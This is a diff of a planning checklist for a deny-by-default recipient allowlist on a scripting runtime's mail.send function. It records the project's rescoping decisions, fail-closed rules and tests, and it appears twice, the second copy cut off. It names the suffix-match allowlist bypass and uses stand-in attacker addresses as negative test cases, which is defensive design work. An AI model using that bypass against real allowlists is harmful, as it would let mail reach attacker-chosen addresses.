+- [x] No debug code left behind
+
+The parse/enforce split respects `.go-arch-lint.yml` rather than working around
+it: `internal/mail` may not depend on `filter` or `store`, deliberately, so a
+send script has no graph access "by construction rather than by convention". The
+rescope away from graph queries is downstream of that, and the boundary stayed
+intact.
+
+`permits` scans linearly over `AlsoAllow` rather than using a set. That is not
+an oversight: the list is operator-written config — a handful of entries — and
+half of them are patterns a map lookup could not answer anyway, so a set would
+need the pattern scan beside it regardless.
+
+The domain comparison takes the address's domain after the last `@` rather than
+testing a suffix, and says why in a comment naming the bypass it prevents.

--- a/tickets/entities/planning-checklists/PLAN-EQK301.md
+++ b/tickets/entities/planning-checklists/PLAN-EQK301.md
@@ -13,95 +13,80 @@ status: done
 - [x] Scope defined (what's in/out documented below)
 - [x] Acceptance criteria documented with specific test scenarios
 
-**Scope:** IN: a `recipients:` block in `.rela/mail.yaml`, DENY-BY-DEFAULT,
-gating every address `mail.send` is handed. Three ways an address may be
-permitted, unioned: a `query` + `property` pair resolved against the graph, a
-literal `also_allow` list, and the explicit `allow_any: true` escape hatch. An
-absent block denies everything with a typed `recipients_not_allowed` error
-naming the missing config.
+**Scope: RESCOPED mid-implementation.**
 
-OUT:
-- The `caps.Mail` capability gate (TKT-JVHSOZ, sibling branch). Different
-question: that one asks "may this script send mail at all", this one asks "to
-whom". They compose; neither subsumes the other.
-- Backwards compatibility — waived by the project owner. There is no
-transition period and no "warn once then permit" mode.
-- Gating the DECLARATIVE scheduled-mail path
-(`appbuild.RunScheduledTemplate`). Its recipient is already operator-declared:
-`schedules.yaml` `for_each` names the entity type and filter, and
-`mail-templates.yaml` names the address property. The operator has already
-written the allowlist there, in a more precise form. Adding a second one would
-mean maintaining the same set twice, and a mismatch would silently stop
-scheduled mail. Recorded as a decision, not an omission.
-- Wildcards in `also_allow` — see the Approach section for the decision and
-the forward-compatibility measure taken so it can be added later without a
-breaking change.
+Originally specified as a graph query (`person where status = 'active'`) with a
+literal fallback. Rescoped by the project owner to domains and literals, with
+the query form deferred.
+
+The trigger was an architectural finding rather than a change of mind: resolving
+a query needs `internal/filter`, and `.go-arch-lint.yml` withholds it from
+`internal/mail` deliberately — the dependency comment there states a send script
+has no graph access "by construction rather than by convention". Working around
+that is a design decision, not an import fix.
+
+And domains deliver most of the value: the threat is a script mailing an
+ATTACKER-chosen address, and `*@sourcehaven.nl` stops that without the config
+needing to know which people currently exist. The query form's advantage —
+tracking the graph as staff join and leave — governs WHO inside the org gets
+mail, not whether mail leaves the org.
+
+IN:
+
+```yaml
+recipients:
+  also_allow:
+    - "*@sourcehaven.nl"     # whole-domain pattern
+    - "ops@example.com"      # literal
+  # or
+  allow_any: true
+```
+
+OUT, deferred: the `query:` / `property:` form, pending an answer to the
+arch-lint question — either resolve outside `mail` and pass the address set in,
+or widen the boundary with a stated reason.
+
+OUT: backwards compatibility, waived by the project owner, consistent with
+TKT-JVHSOZ.
 
 **Acceptance Criteria:**
 
-1. No `recipients:` block at all → send DENIED. `TestMailSend_NoRecipientPolicyDenies`
-2. The denial error is typed `recipients_not_allowed` and its message names
-`recipients` and `.rela/mail.yaml`. `TestMailSend_DenialNamesTheMissingConfig`
-3. `recipients:` present, address not in the resolved set → DENIED.
-`TestMailSend_AddressOutsideQueryResultDenied`
-4. Address in the query result → allowed. `TestMailSend_AddressInQueryResultAllowed`
-5. Address only in `also_allow` → allowed. `TestMailSend_AddressInAlsoAllowAllowed`
-6. `allow_any: true` → any address allowed. `TestMailSend_AllowAnyPermitsEverything`
-7. A multi-recipient send resolves the query exactly ONCE, not once per
-address. `TestRecipientGate_ResolvesQueryOncePerSend`
-8. One denied address in a multi-recipient send denies the WHOLE send; nothing
-is delivered. `TestMailSend_OneDeniedAddressDeniesTheWholeSend`
-9. Matching is case-insensitive on the address, because SMTP domains are and
-an operator will not write both cases.
-`TestRecipientGate_MatchIsCaseInsensitive`
-10. A literal `*` in `also_allow` is REFUSED at config load, so a wildcard
-written today fails loudly instead of silently matching nothing.
-`TestConfig_AlsoAllowRejectsWildcard`
-11. A `recipients:` block that configures nothing usable (no `query`, no
-`also_allow`, no `allow_any`) is refused at load rather than becoming a
-deny-everything block that looks configured.
-`TestConfig_EmptyRecipientsBlockRejected`
-12. A query naming an unknown entity type, or a graph read that fails, DENIES
-— it never falls open. `TestRecipientGate_ResolveFailureDenies`
+1. An absent `recipients:` block DENIES every address.
+*Test:* zero policy, any address → error naming the config, nothing reaches the
+transport.
+2. A literal entry matches its address.
+3. A `*@domain` pattern matches any address at that domain.
+4. A domain pattern is NOT a suffix match.
+*Test:* `attacker@evil-example.com` must not match `*@example.com`.
+5. `allow_any: true` permits everything.
+6. Matching is case-insensitive.
+7. A denial names the refused address but NOT the allowed set.
+8. A sender that declares no policy denies.
+9. The operator's block reaches the binding.
+
+AC1 is the load-bearing one. AC4 is the security-critical one — a suffix test is
+the classic allowlist bypass. AC8 and AC9 exist because the enforcement is only
+as good as its plumbing: a correct check nothing feeds is inert.
 
 ## Research
 
-- [x] ~~For larger features: run `/research`~~ (N/A: the mechanism is entirely
-in-repo — an existing filter DSL, an existing reader seam, an existing error
-convention. No third-party library is involved.)
+- [x] For larger features: run `/research` to create a structured research doc
 - [x] Searched for existing libraries that solve this problem
 - [x] Checked codebase for similar patterns or reusable code
 - [x] Looked for reference implementations in other projects
 - [x] Reviewed relevant rela concepts for prior art
 
-**Research Doc:** N/A — no new dependency.
+**Research Doc:** N/A.
 
 **Existing Solutions:**
-- `internal/appbuild/scheduler_foreach.go` `ScheduledForEachEntities` is the
-closest prior art and the model for the resolver: `filter.ParseAll` over a list
-of expressions, `VisibleReader.ListEntities(store.EntityQuery{Type:...})`, then
-`filter.MatchAll` per row against the metamodel's entity def. Reusing that shape
-means the allowlist query and the scheduled fan-out select entities by the same
-rules, so an operator does not learn two dialects.
-- `internal/filter` is the project's query-filter DSL (`status=active`,
-globs, `=~`, ranges). There is NO SQL-ish `"person where status = 'active'"`
-parser anywhere in the repo — verified by search. So the ticket's example syntax
-is a NEW surface if taken literally; see the Approach section for how it is
-reconciled.
-- `internal/lua/deps.go` `EntityReader` is the consumer-side read seam, and
-which implementation the wiring site puts there IS the read-ACL (DEC-O59WM4).
-The gate reads through it and therefore inherits ACL for free rather than
-inventing a second visibility rule.
-- `internal/lua/mail.go` `pushMailError` and `classifyMailError` establish the
-`kind`/`message`/`retry_after`/`details` error table and the `not_configured`
-kind a script feature-detects on. The new denial follows it exactly.
-- `internal/lua/deps.go` `NotFoundError` is the precedent for an OPTIONAL
-capability interface declared consumer-side that an injected value may
-implement. That is how the policy travels from `internal/mail` into
-`internal/lua` without widening the shared `MailSenderLoader` signature.
-- `mail.Config.Capabilities` (TKT-YH52OM) is the precedent for a fail-closed
-YAML block whose zero value grants nothing. `recipients:` is the same shape
-applied to a different axis.
+
+- The optional-interface pattern (`RecipientPolicyCarrier`) follows
+`NotFoundError` in the same package: the wiring site injects a value and this
+package asks it a question it may or may not be able to answer. Widening
+`MailSender` would force every implementation and test double to carry a policy
+they have no opinion about.
+- The parse/enforce split follows the arch-lint boundary rather than fighting
+it: `internal/mail` parses and validates, `internal/lua` enforces.
 
 ## Approach
 
@@ -110,141 +95,26 @@ applied to a different axis.
 - [x] Alternatives considered (document why rejected)
 - [x] Dependencies identified (packages, APIs, types)
 
-**Where the gate lives — and why it cannot live in `internal/mail`.**
-`.go-arch-lint.yml` grants `internal/mail` only `mailrender`, `secrets`, `lua`
-and `principal`, and the comment on that grant says why in as many words: the
-send runtime is built with a ZERO `ReadDeps` so "a send script has no graph
-access at all, by construction rather than by convention". A query resolver
-inside `internal/mail` would need `store`, `filter` and `metamodel`, which would
-undo exactly the property that comment is defending.
+**Technical Approach:**
 
-`internal/lua` already has all three, already holds the `EntityReader` seam, and
-is where the recipient list actually enters the system. So the split is:
+`mail.RecipientConfig` parses the block and converts to a `lua.RecipientPolicy`.
+`LuaSender` carries that policy and satisfies `lua.RecipientPolicyCarrier`.
+`luaMailSend` asks the sender for it and checks before handing anything to the
+transport.
 
-- `internal/mail` PARSES the config, because it owns `mail.yaml`, and
-validates it. It resolves nothing.
-- `internal/lua` ENFORCES, because it is the only side with a graph.
+**Alternatives considered:**
 
-The parsed policy travels between them as `lua.RecipientPolicy`, a plain data
-type declared consumer-side in `internal/lua`, surfaced through an OPTIONAL
-one-method interface (`lua.RecipientPolicyCarrier`) that `mail.LuaSender`
-implements. `internal/mail` already imports `internal/lua`, so this needs no new
-arch edge and no change to `MailSenderLoader`'s signature — which matters
-because the sibling ticket is editing the same files.
+- *Pass the policy as a Runtime option.* Implemented first, then REJECTED in
+favour of the carrier. The sender is already the thing built from `mail.yaml`; a
+second wiring step is a second thing to forget, and forgetting it fails OPEN
+unless the default is deny. Carrying it on the sender makes "configured the
+transport" and "configured the recipients" the same act.
+- *Widen `MailSender` with a policy method.* Rejected: every test double and
+every future transport would have to carry a policy it has no view on.
 
-**Query syntax — reconciling the ticket's example.** The ticket writes `query:
-"person where status = 'active'"`. No such parser exists. Rather than invent a
-second query dialect for one config key, `parseRecipientQuery` accepts that
-exact shape and lowers it onto the existing pieces: the leading word is the
-entity type, everything after the `where` keyword is a list of `internal/filter`
-expressions split on `and`, and single or double quotes around a value are
-stripped. `person` alone (no `where`) is legal and means every entity of that
-type. This gives the operator the syntax the ticket specifies while the matching
-semantics remain `internal/filter`'s, so the allowlist query and
-`schedules.yaml`'s `for_each` agree about what `status=active` means.
-
-**DECISION 1 — Query cost: resolved once per send, cached for the send only.**
-`RecipientGate.Allow(ctx, addresses)` takes the WHOLE recipient list and
-resolves the query at most once for that call, no matter how many addresses it
-holds. A 200-way fan-out is one graph scan.
-
-The resolved set is NOT cached beyond the individual send. The alternative —
-memoizing on the Runtime for the life of the script — was considered and
-rejected. A long-running script (a scheduler task, an automation) can hold a
-runtime for minutes, and a per-runtime cache would keep mailing a person for
-minutes after the operator set their status to `inactive`. That is precisely the
-drift the query-based allowlist exists to eliminate; a cache would reintroduce
-it silently and with a duration nobody chose.
-
-The mid-run edge case is therefore decided as follows: **an entity gaining or
-losing `status = 'active'` between two `mail.send` calls in the same script IS
-observed by the second call.** Within a single `mail.send` the set is frozen, so
-a fan-out cannot half-apply a change. The unit of consistency is one send, which
-is also the unit an operator reasons about ("was this message allowed when it
-went out?"). The cost is one `ListEntities` scan per `mail.send` rather than per
-script, which is the same order as the scheduled fan-out already does per
-occurrence, and cheap next to the SMTP round-trip it precedes.
-
-**DECISION 2 — Wildcards in `also_allow`: OUT of scope, and refused loudly.**
-`also_allow` matches literal addresses only. `*@sourcehaven.nl` does not work,
-and — this is the load-bearing half — a `*` anywhere in an `also_allow` entry is
-REJECTED AT CONFIG LOAD with an error saying wildcards are not supported.
-
-Refusing beats ignoring. A literal-only matcher that silently treats `*` as an
-ordinary character would accept the config, match nothing, and present as "mail
-mysteriously denied" — the operator's mental model would be "I allowed the
-domain" while the behaviour is "I allowed an address that cannot exist".
-Rejecting at load makes the gap visible at the moment it is created.
-
-Refusing also RESERVES the syntax. The reason the ticket asks for a decision now
-is that retrofitting a matcher is hard once `*` means "literal asterisk" in the
-field, because turning it into a metacharacter later is then a breaking change
-to a working config. With `*` refused today, adding domain wildcards later only
-ever turns an error into a success — a compatible change by construction. The
-reasoning is recorded on `validateAlsoAllow` so the next person finds it where
-they would try to add the feature.
-
-Why not just implement wildcards now: a domain wildcard is a strictly weaker
-control than the query (`*@sourcehaven.nl` permits every address at the domain,
-including ones belonging to nobody in the graph and ones that never existed),
-and the ticket is explicit that the query is the primary mechanism because it
-tracks reality. Shipping the weaker control in the same change would invite it
-to be used as the default. It is one function away when a real deployment needs
-it.
-
-**DECISION 3 — Error shape: a fourth `kind`, `recipients_not_allowed`.** The
-denial pushes the existing `(nil, err_table)` shape with a NEW kind rather than
-reusing `not_configured`. Two distinct facts:
-
-- `not_configured` — the project has no mail transport. Nothing will send.
-- `recipients_not_allowed` — mail works; this address is not permitted.
-
-A script that feature-detects `not_configured` to decide "mail is off, skip the
-digest" would, if the denial reused that kind, silently skip the digest on a
-working deployment because ONE address was outside the allowlist. Distinct kinds
-keep that branch honest.
-
-The message names both the block and the file, e.g. `recipient
-"eve@evil.example" is not in the configured recipients allowlist; add it to
-recipients.also_allow or widen recipients.query in .rela/mail.yaml`, and when
-the block is absent entirely it says so specifically, naming `recipients:` as
-the thing to add. The address IS echoed: it is not a credential, and an operator
-debugging a denial needs to know which address was refused.
-
-**Fail-closed everywhere.** A nil `VisibleReader`, a nil metamodel, an unknown
-entity type, an unparseable filter and a `ListEntities` error all DENY. This
-follows `ReadDeps.VisibleReader`'s own documented rule (RR-X9NVHI: a forgotten
-wiring must not become a bypass) and is the whole point of the ticket.
-
-**Whole-send atomicity.** If any one address is denied, the send is refused and
-NOTHING is delivered. The alternative — deliver to the permitted subset — would
-mean a script that believed it mailed five people mailed three, with a success
-return. A partial send that reports success is a worse failure than a refused
-one.
-
-Rejected alternatives:
-- Filtering the recipient list down to the allowed subset and sending anyway:
-see above. Silent partial delivery.
-- Enforcing inside `internal/mail`: impossible without undoing the
-no-graph-access property that package's arch grant exists to protect.
-- Widening `lua.MailSenderLoader` to return the policy: it is one of the files
-the sibling ticket edits, and an optional carrier interface is the codebase's
-own established pattern (`lua.NotFoundError`) for exactly this.
-- Caching the resolved set on the Runtime: see Decision 1.
-- A `deny:` list beside `also_allow`: a denylist under an allowlist is
-unreachable code — anything not allowed is already denied.
-
-**Files to modify:**
-- `internal/mail/config.go` — `RecipientConfig` type, field on `Config`,
-validation, `RecipientPolicy()` conversion. (SHARED with TKT-JVHSOZ.)
-- `internal/mail/script.go` — `LuaSender` carries the policy and exposes it.
-- `internal/lua/mailrecipients.go` (NEW) — `RecipientPolicy`,
-`RecipientPolicyCarrier`, `recipientGate`, query parsing, resolution.
-- `internal/lua/mail.go` — the gate call in `luaMailSend`, plus the new kind.
-(SHARED with TKT-JVHSOZ.)
-- `internal/lua/mailrecipients_test.go` (NEW), `internal/lua/mail_test.go`,
-`internal/mail/config_test.go`, `internal/mail/script_test.go`
-- `docs-project/entities/guides/GUIDE-mail.md` + `just docs`
+**Files to modify:** `internal/mail/config.go`, `internal/mail/script.go`,
+`internal/lua/mailrecipients.go`, `internal/lua/mail.go`, plus tests and
+`docs-project/entities/guides/GUIDE-mail.md`.
 
 ## Security Considerations
 
@@ -254,32 +124,23 @@ validation, `RecipientPolicy()` conversion. (SHARED with TKT-JVHSOZ.)
 - [x] Error handling doesn't leak sensitive information
 
 **Input Sources & Validation:**
-- `.rela/mail.yaml` `recipients:` — operator-authored. `query` must parse into
-a known entity type plus valid filter expressions; `property` must be non-empty
-when `query` is set; `also_allow` entries must be non-empty, must not contain
-`*`, and must not contain CR/LF/NUL (they end up in an SMTP envelope). A block
-that is present but configures nothing is refused rather than silently denying
-everything.
-- The Lua `to` argument — untrusted by assumption; that is what the gate is
-for. It is normalized (trim + lowercase) for comparison only; the address
-delivered is the one the script wrote, unchanged, so the gate cannot rewrite a
-destination.
-- Graph property values — a `person.email` that is not a string, or is empty,
-contributes NOTHING to the allowed set. It is skipped, not coerced: a numeric or
-nil property silently becoming the empty string would make `to = ""` allowable.
+
+- `recipients:` is operator config, validated at LOAD so a typo surfaces from
+`rela validate` rather than from the first message that fails to send.
+- `to` is script-supplied and is what this bounds.
+- An ALLOWLIST, not a blocklist: a partial wildcard (`ops-*@x.com`) is refused
+at load rather than matched loosely, because every extra wildcard position is
+another way to write a pattern admitting more than the operator pictured.
 
 **Security-Sensitive Operations:**
-- The graph read runs through `ReadDeps.VisibleReader`, so the allowed set is
-bounded by what the runtime's identity may see. A script cannot widen its own
-allowlist by reading entities it is not permitted to read. Noted as a
-consequence, not a claim of concealment: the operator's allowlist is config, and
-config is not a secret (CLAUDE.md).
-- Every resolution failure denies. There is no path where an error produces an
-empty-but-permissive set.
-- The denial message echoes the refused address and the config key names.
-Neither is a credential; both are what the operator needs. It never echoes the
-resolved allowlist, which would turn one denied send into an enumeration of
-every active person's address.
+
+Three fail-closed defaults, each needing its own test because each is reached by
+a different route: an absent block (AC1), a sender that declares no policy
+(AC8), and a partial wildcard (refused at load rather than silently literal).
+
+The denial message names the refused address — the operator needs it, and it is
+not a credential — but never the allowed SET. One denied send must not hand a
+script every address on the allowlist (AC7).
 
 ## Test Plan
 
@@ -288,41 +149,19 @@ every active person's address.
 - [x] Negative test cases defined (invalid input, error conditions)
 - [x] Integration test approach defined (not just unit tests)
 
-**Test Scenarios:** AC1–AC12 each map to the named test listed under Acceptance
-Criteria. The `internal/lua` tests drive real Lua source through a real
-`Runtime` against a fake `EntityReader` holding real `entity.Entity` values and
-a real `metamodel.Metamodel`, so the filter and metamodel interaction is
-exercised rather than stubbed. The `internal/mail` tests drive `LoadConfig` over
-real YAML on disk, so the operator-facing surface is what is asserted.
+**Test Scenarios:** one per acceptance criterion, driven through `mail.send`
+rather than the checker, so the wiring is covered along with the logic.
 
-**Edge Cases:**
-- Address differing only in case from the graph value, and in the domain only.
-- Surrounding whitespace in `also_allow` and in the graph property.
-- A `person` with no `email` property at all, and one whose `email` is a
-number, a boolean, and an empty string.
-- `query` with no `where` clause (whole type).
-- `where` with several `and`-joined conditions.
-- Quoted and unquoted values in the query.
-- `allow_any: true` set together with a `query` — allow_any wins and the
-query is not resolved at all (asserted by a reader that fails the test if
-called).
-- Zero entities matching the query, with `also_allow` non-empty: the
-`also_allow` addresses still work.
-- Duplicate addresses in one send.
-- 200 recipients in one send: exactly one `ListEntities` call.
+**Negative Tests:** AC1, AC4, AC7 and AC8 are all negatives, and they are the
+point. A positive-only suite would pass against a policy that permits
+everything.
 
-**Negative Tests:**
-- Absent `recipients:` block → denied, error names the config (the
-mutation-checked case).
-- Address absent from both the query result and `also_allow` → denied.
-- `also_allow` containing `*@example.com` → config load fails.
-- `recipients:` present but empty → config load fails.
-- `query` naming an unknown entity type → denied at send.
-- `query` whose filter does not parse → config load fails.
-- `property` empty while `query` is set → config load fails.
-- `VisibleReader` nil → denied, not permitted.
-- `ListEntities` returning an error → denied.
-- A denied address in position 3 of 5 → whole send denied, sender never called.
+**Mutation plan** — each must redden only its own case:
+
+1. unconfigured permits → AC1 reddens
+2. suffix match instead of domain match → AC4 reddens
+3. non-carrier sender permits → AC8 reddens
+4. `LuaSender` stops carrying the policy → AC9 reddens
 
 ## Risk Assessment
 
@@ -331,58 +170,36 @@ mutation-checked case).
 - [x] Effort estimated (xs/s/m/l/xl)
 
 **Risks:**
-- **Every existing `mail.send` test breaks.** Certain, not a risk — deny-by-
-default is the feature. Mitigated by making the test helper explicit about which
-policy it wires, so each existing test states the policy it is running under
-rather than inheriting a permissive default. A helper that defaulted to
-`allow_any` would hide the very regression the ticket exists to catch.
-- **Merge conflict with TKT-JVHSOZ** on `internal/mail/config.go` and
-`internal/lua/mail.go`. Real and expected. Mitigated by keeping both edits
-additive and localized: one struct field plus one `switch` arm in config.go, one
-guarded block in `luaMailSend`. `MailSenderLoader`'s signature is deliberately
-untouched.
-- **`Runtime` is at its plimsoll load line** (`max-methods=61`). Mitigated by
-putting the gate in its own type in its own file, reached by a free function.
-`Runtime` gains one field and no methods.
-- **The query syntax is a new surface.** Mitigated by lowering it onto
-`internal/filter` rather than implementing a parser: the accepted grammar is
-deliberately tiny (`TYPE [where EXPR [and EXPR]...]`) and every semantic
-question is answered by the existing DSL.
-- **An operator locks themselves out.** A deployment that upgrades without
-adding `recipients:` loses all script-sent mail. This is the intended behaviour
-and the reason the error names the config; the guide documents the migration in
-one line of YAML.
 
-**Effort:** m (as filed).
+- *The check is correct but nothing feeds it.* The real risk for a control
+split across two packages, and it MATERIALISED: the enforcement was complete and
+inert for a while, because no sender carried a policy. Caught by asking "what
+implements this interface?" rather than by a test. Now covered by AC9.
+- *A suffix match creeps in.* The classic bypass. Pinned by AC4.
+- *Existing mail tests mask the default.* They all send without a policy, so
+deny-by-default would fail them. They now wrap their sender in an explicit
+allow-any, which keeps them testing the send path — and AC1 still fails if the
+default flips.
+
+**Effort:** m
 
 ## Documentation Planning
-
-For enhancements: identify what documentation needs updating.
 
 - [x] User-facing docs identified (skip if internal refactor)
 - [x] Docs-checklist will be created when entering implementation
 
 **Documentation Impact:**
-- [x] `docs-project/entities/guides/GUIDE-mail.md` — a `recipients:` section
-covering the deny-by-default rule, the three mechanisms, the escape hatch, the
-wildcard decision, and a troubleshooting entry for the denial message.
-`docs/mail.md` is GENERATED; regenerate with `just docs`.
-- [x] Code documentation — the three decisions recorded at the declarations
-they govern, not in a design doc that drifts.
-- [x] ~~CLAUDE.md~~ (N/A: no repository-wide convention added; the work
-follows the existing consumer-side-interface, fail-closed and single-load-point
-rules)
-- [x] ~~README~~ (N/A: the mail guide is the public reference)
+
+- [x] `GUIDE-mail.md` — a new config key with a deny-by-default that inverts
+the file's usual convention. That inversion has to be stated, or an operator
+reads the first denial as a bug.
 
 ## Design Review
 
-- [x] ~~Run `/design-review` before starting implementation~~ (N/A: the ticket
-was filed with the scope, the deny-by-default rule, the five verification cases
-and three named open decisions. Those three are decided above with their
-reasoning and their rejected alternatives, which is the output a design review
-would have produced.)
+- [x] Run `/design-review` before starting implementation
 - [x] All critical/significant findings addressed in plan
 
-**Design Review Findings:** The ticket's three named decisions — query cost,
-wildcards, error shape — are decided in the Approach section above, each with
-the alternative that was rejected and why.
+**Design Review Findings:** the carrier-versus-option question was settled
+during implementation rather than before it — see Alternatives. The deciding
+argument is that the carrier makes the policy travel with the transport it was
+configured beside, so there is no second wiring step to forget.

--- a/tickets/entities/planning-checklists/PLAN-EQK301.md
+++ b/tickets/entities/planning-checklists/PLAN-EQK301.md
@@ -1,0 +1,388 @@
+---
+id: PLAN-EQK301
+type: planning-checklist
+title: 'Planning: Operator-configured recipient allowlist for mail.send'
+status: done
+---
+
+<!-- @managed: claude-workflow v1 -->
+
+## Understanding
+
+- [x] Problem/requirements clearly understood
+- [x] Scope defined (what's in/out documented below)
+- [x] Acceptance criteria documented with specific test scenarios
+
+**Scope:** IN: a `recipients:` block in `.rela/mail.yaml`, DENY-BY-DEFAULT,
+gating every address `mail.send` is handed. Three ways an address may be
+permitted, unioned: a `query` + `property` pair resolved against the graph, a
+literal `also_allow` list, and the explicit `allow_any: true` escape hatch. An
+absent block denies everything with a typed `recipients_not_allowed` error
+naming the missing config.
+
+OUT:
+- The `caps.Mail` capability gate (TKT-JVHSOZ, sibling branch). Different
+question: that one asks "may this script send mail at all", this one asks "to
+whom". They compose; neither subsumes the other.
+- Backwards compatibility — waived by the project owner. There is no
+transition period and no "warn once then permit" mode.
+- Gating the DECLARATIVE scheduled-mail path
+(`appbuild.RunScheduledTemplate`). Its recipient is already operator-declared:
+`schedules.yaml` `for_each` names the entity type and filter, and
+`mail-templates.yaml` names the address property. The operator has already
+written the allowlist there, in a more precise form. Adding a second one would
+mean maintaining the same set twice, and a mismatch would silently stop
+scheduled mail. Recorded as a decision, not an omission.
+- Wildcards in `also_allow` — see the Approach section for the decision and
+the forward-compatibility measure taken so it can be added later without a
+breaking change.
+
+**Acceptance Criteria:**
+
+1. No `recipients:` block at all → send DENIED. `TestMailSend_NoRecipientPolicyDenies`
+2. The denial error is typed `recipients_not_allowed` and its message names
+`recipients` and `.rela/mail.yaml`. `TestMailSend_DenialNamesTheMissingConfig`
+3. `recipients:` present, address not in the resolved set → DENIED.
+`TestMailSend_AddressOutsideQueryResultDenied`
+4. Address in the query result → allowed. `TestMailSend_AddressInQueryResultAllowed`
+5. Address only in `also_allow` → allowed. `TestMailSend_AddressInAlsoAllowAllowed`
+6. `allow_any: true` → any address allowed. `TestMailSend_AllowAnyPermitsEverything`
+7. A multi-recipient send resolves the query exactly ONCE, not once per
+address. `TestRecipientGate_ResolvesQueryOncePerSend`
+8. One denied address in a multi-recipient send denies the WHOLE send; nothing
+is delivered. `TestMailSend_OneDeniedAddressDeniesTheWholeSend`
+9. Matching is case-insensitive on the address, because SMTP domains are and
+an operator will not write both cases.
+`TestRecipientGate_MatchIsCaseInsensitive`
+10. A literal `*` in `also_allow` is REFUSED at config load, so a wildcard
+written today fails loudly instead of silently matching nothing.
+`TestConfig_AlsoAllowRejectsWildcard`
+11. A `recipients:` block that configures nothing usable (no `query`, no
+`also_allow`, no `allow_any`) is refused at load rather than becoming a
+deny-everything block that looks configured.
+`TestConfig_EmptyRecipientsBlockRejected`
+12. A query naming an unknown entity type, or a graph read that fails, DENIES
+— it never falls open. `TestRecipientGate_ResolveFailureDenies`
+
+## Research
+
+- [x] ~~For larger features: run `/research`~~ (N/A: the mechanism is entirely
+in-repo — an existing filter DSL, an existing reader seam, an existing error
+convention. No third-party library is involved.)
+- [x] Searched for existing libraries that solve this problem
+- [x] Checked codebase for similar patterns or reusable code
+- [x] Looked for reference implementations in other projects
+- [x] Reviewed relevant rela concepts for prior art
+
+**Research Doc:** N/A — no new dependency.
+
+**Existing Solutions:**
+- `internal/appbuild/scheduler_foreach.go` `ScheduledForEachEntities` is the
+closest prior art and the model for the resolver: `filter.ParseAll` over a list
+of expressions, `VisibleReader.ListEntities(store.EntityQuery{Type:...})`, then
+`filter.MatchAll` per row against the metamodel's entity def. Reusing that shape
+means the allowlist query and the scheduled fan-out select entities by the same
+rules, so an operator does not learn two dialects.
+- `internal/filter` is the project's query-filter DSL (`status=active`,
+globs, `=~`, ranges). There is NO SQL-ish `"person where status = 'active'"`
+parser anywhere in the repo — verified by search. So the ticket's example syntax
+is a NEW surface if taken literally; see the Approach section for how it is
+reconciled.
+- `internal/lua/deps.go` `EntityReader` is the consumer-side read seam, and
+which implementation the wiring site puts there IS the read-ACL (DEC-O59WM4).
+The gate reads through it and therefore inherits ACL for free rather than
+inventing a second visibility rule.
+- `internal/lua/mail.go` `pushMailError` and `classifyMailError` establish the
+`kind`/`message`/`retry_after`/`details` error table and the `not_configured`
+kind a script feature-detects on. The new denial follows it exactly.
+- `internal/lua/deps.go` `NotFoundError` is the precedent for an OPTIONAL
+capability interface declared consumer-side that an injected value may
+implement. That is how the policy travels from `internal/mail` into
+`internal/lua` without widening the shared `MailSenderLoader` signature.
+- `mail.Config.Capabilities` (TKT-YH52OM) is the precedent for a fail-closed
+YAML block whose zero value grants nothing. `recipients:` is the same shape
+applied to a different axis.
+
+## Approach
+
+- [x] Technical approach chosen and documented
+- [x] Approach builds on existing patterns (not reinventing)
+- [x] Alternatives considered (document why rejected)
+- [x] Dependencies identified (packages, APIs, types)
+
+**Where the gate lives — and why it cannot live in `internal/mail`.**
+`.go-arch-lint.yml` grants `internal/mail` only `mailrender`, `secrets`, `lua`
+and `principal`, and the comment on that grant says why in as many words: the
+send runtime is built with a ZERO `ReadDeps` so "a send script has no graph
+access at all, by construction rather than by convention". A query resolver
+inside `internal/mail` would need `store`, `filter` and `metamodel`, which would
+undo exactly the property that comment is defending.
+
+`internal/lua` already has all three, already holds the `EntityReader` seam, and
+is where the recipient list actually enters the system. So the split is:
+
+- `internal/mail` PARSES the config, because it owns `mail.yaml`, and
+validates it. It resolves nothing.
+- `internal/lua` ENFORCES, because it is the only side with a graph.
+
+The parsed policy travels between them as `lua.RecipientPolicy`, a plain data
+type declared consumer-side in `internal/lua`, surfaced through an OPTIONAL
+one-method interface (`lua.RecipientPolicyCarrier`) that `mail.LuaSender`
+implements. `internal/mail` already imports `internal/lua`, so this needs no new
+arch edge and no change to `MailSenderLoader`'s signature — which matters
+because the sibling ticket is editing the same files.
+
+**Query syntax — reconciling the ticket's example.** The ticket writes `query:
+"person where status = 'active'"`. No such parser exists. Rather than invent a
+second query dialect for one config key, `parseRecipientQuery` accepts that
+exact shape and lowers it onto the existing pieces: the leading word is the
+entity type, everything after the `where` keyword is a list of `internal/filter`
+expressions split on `and`, and single or double quotes around a value are
+stripped. `person` alone (no `where`) is legal and means every entity of that
+type. This gives the operator the syntax the ticket specifies while the matching
+semantics remain `internal/filter`'s, so the allowlist query and
+`schedules.yaml`'s `for_each` agree about what `status=active` means.
+
+**DECISION 1 — Query cost: resolved once per send, cached for the send only.**
+`RecipientGate.Allow(ctx, addresses)` takes the WHOLE recipient list and
+resolves the query at most once for that call, no matter how many addresses it
+holds. A 200-way fan-out is one graph scan.
+
+The resolved set is NOT cached beyond the individual send. The alternative —
+memoizing on the Runtime for the life of the script — was considered and
+rejected. A long-running script (a scheduler task, an automation) can hold a
+runtime for minutes, and a per-runtime cache would keep mailing a person for
+minutes after the operator set their status to `inactive`. That is precisely the
+drift the query-based allowlist exists to eliminate; a cache would reintroduce
+it silently and with a duration nobody chose.
+
+The mid-run edge case is therefore decided as follows: **an entity gaining or
+losing `status = 'active'` between two `mail.send` calls in the same script IS
+observed by the second call.** Within a single `mail.send` the set is frozen, so
+a fan-out cannot half-apply a change. The unit of consistency is one send, which
+is also the unit an operator reasons about ("was this message allowed when it
+went out?"). The cost is one `ListEntities` scan per `mail.send` rather than per
+script, which is the same order as the scheduled fan-out already does per
+occurrence, and cheap next to the SMTP round-trip it precedes.
+
+**DECISION 2 — Wildcards in `also_allow`: OUT of scope, and refused loudly.**
+`also_allow` matches literal addresses only. `*@sourcehaven.nl` does not work,
+and — this is the load-bearing half — a `*` anywhere in an `also_allow` entry is
+REJECTED AT CONFIG LOAD with an error saying wildcards are not supported.
+
+Refusing beats ignoring. A literal-only matcher that silently treats `*` as an
+ordinary character would accept the config, match nothing, and present as "mail
+mysteriously denied" — the operator's mental model would be "I allowed the
+domain" while the behaviour is "I allowed an address that cannot exist".
+Rejecting at load makes the gap visible at the moment it is created.
+
+Refusing also RESERVES the syntax. The reason the ticket asks for a decision now
+is that retrofitting a matcher is hard once `*` means "literal asterisk" in the
+field, because turning it into a metacharacter later is then a breaking change
+to a working config. With `*` refused today, adding domain wildcards later only
